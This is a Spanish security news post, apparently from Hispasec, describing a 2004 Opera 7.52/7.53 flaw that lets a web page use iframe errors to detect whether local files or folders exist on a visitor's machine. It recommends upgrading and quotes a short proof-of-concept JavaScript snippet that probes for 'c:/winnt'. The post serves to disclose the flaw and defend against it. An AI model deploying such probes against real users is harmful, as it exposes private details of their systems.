Revelación de información sensible en Opera 7.52 y 7.53


Se ha descubierto una vulnerabilidad en algunas versiones del popular navegador Opera que podría ser explotada por un usuario remoto para adquirir información sensible de un sistema remoto.





Cuando se asigna a un iframe un archivo o directorio que no existe,
este navegador generará un error. Un usuario remoto puede crear código
HTML que carga un iframe y cambia la URL de dicho recurso a un archivo
o directorio local, y entonces se detecta si hay ese error para
determinar si ese elemento existe.

Se recomienda actualizar a la versión 7.54, disponible en la siguiente dirección:
http://www.opera.com/download/

Como ejemplo el siguiente código extraído de la web de GreyMagic, nos
permite saber si la carpeta "winnt" existe en la máquina de la víctima.

"<iframe src="blank.html"></iframe>
<script type="text/javascript">
onload=function () {
var sLocal="c:/winnt";
frames[0].location.href=sLocal;
setTimeout(
function () {
try {
frames[0].document;
alert(sLocal+" does not exists.");
} catch (oErr) {
alert(sLocal+" exists.");
}
},
250
);
}
</script>"

 

Más Información:

Opera Local File/Directory Detection.
http://www.greymagic.com/security/advisories/gm009-op/

Opera Local File IFRAME Error Response Lets Remote Users Determine if Files or Directories Exist
http://www.securitytracker.com/alerts/2004/Aug/1010966.html

Fuente:
Antonio Román
hispasec.com



Otras noticias de interés:

Microsoft prepara un software de seguridad para Windows Server 2003
Microsoft está desarrollando una tecnología de seguridad para su próximo sistema operativo de servidor Windows Server 2003. Se trata de un módulo de software que permitirá a las empresas proteger su información corporativa, ya sean documentos, ...
Vulnerabilidades en servidores Apple Darwin y QuickTime Streaming
@Stake ha publicado - en http://www.atstake.com/research/advisories/2003/a022403-1.txt - que los servidores de administración Apple Darwin y QuickTime Streaming se ven afectados por seis problemas de seguridad que pueden permitir a un atacante toma...
Gene Kan, uno de los creadores de Gnutella, se suicida
Buena parte de los internautas de todo el mundo tiene en sus ordenadores archivos procedentes del sistema de intercambio que él difundió....
Metadatos e información oculta en documentos de OpenOffice
Internet está cambiando. Tras la revolución que supuso la Web 2.0 ylas redes sociales, los expertos investigan ya nuevos paradigmas. Uno de ellos es la Web Semántica: una nueva red en la que, idealmente, las aplicaciones podrán interactuar sin in...
TuxInfo Número 20 publicada
Esta vez presenta cobertura completa de la charla Pre-Wikimania 2009 que realizó Richard Stallman en Argentina, en donde trató diversos temas. Franco Rivero realizó un pequeño resumen con sus comentarios sobre la charla, para luego seguir con una...
Gana dinero con tú correo electronico.
Nota de Xombra: Aún cuando este site no permitirá en el futuro postear este tipo de mensajes , dejamos presentar este por ser el primero y para que el usuario no perdierá el tiempo que uso en colocarlo. Si quieres ganar dine...
10 Boletines de seguridad MS-Windows
01 - MS06-057 Vulnerabilidad en WebViewFolderIcon (923191) | 02 - MS06-058 Ejecución de código en PowerPoint (923191) | 03 - MS06-059 Ejecución de código en MS Excel (924164) | 04 - MS06-060 Ejecución de código en MS Word (924554) | 05 - MS06-0...
iDefense lanza nueva competencia de hacking
iDefense ha anunciado el lanzamiento de su competencia trimestral de hacking. La anterior edición de la misma se llevo a cabo en el ultimo trimestre del año 2005....
Actualización de Opera
Tras la última versión 9.61 de Opera que se lanzó hace unos días, se dieron a conocer nuevas vulnerabilidades seguridad que afectan al navegador, así que antes de que finalice octubre, Opera recibe su tercera actualización del mes....
Envenenamiento de resultados en Google Imágenes
Según ha informado el SANS desde hace varias semanas se están recibiendo informes relacionados con el buscador de imágenes de Google. Ofrece resultados que terminan redirigiendo a páginas de falsos antivirus. Nada nuevo, pero que está siendo esp...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • informacion
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • opera
  • pgp
  • php
  • revelacion
  • sabayon
  • seguridad
  • sensible
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra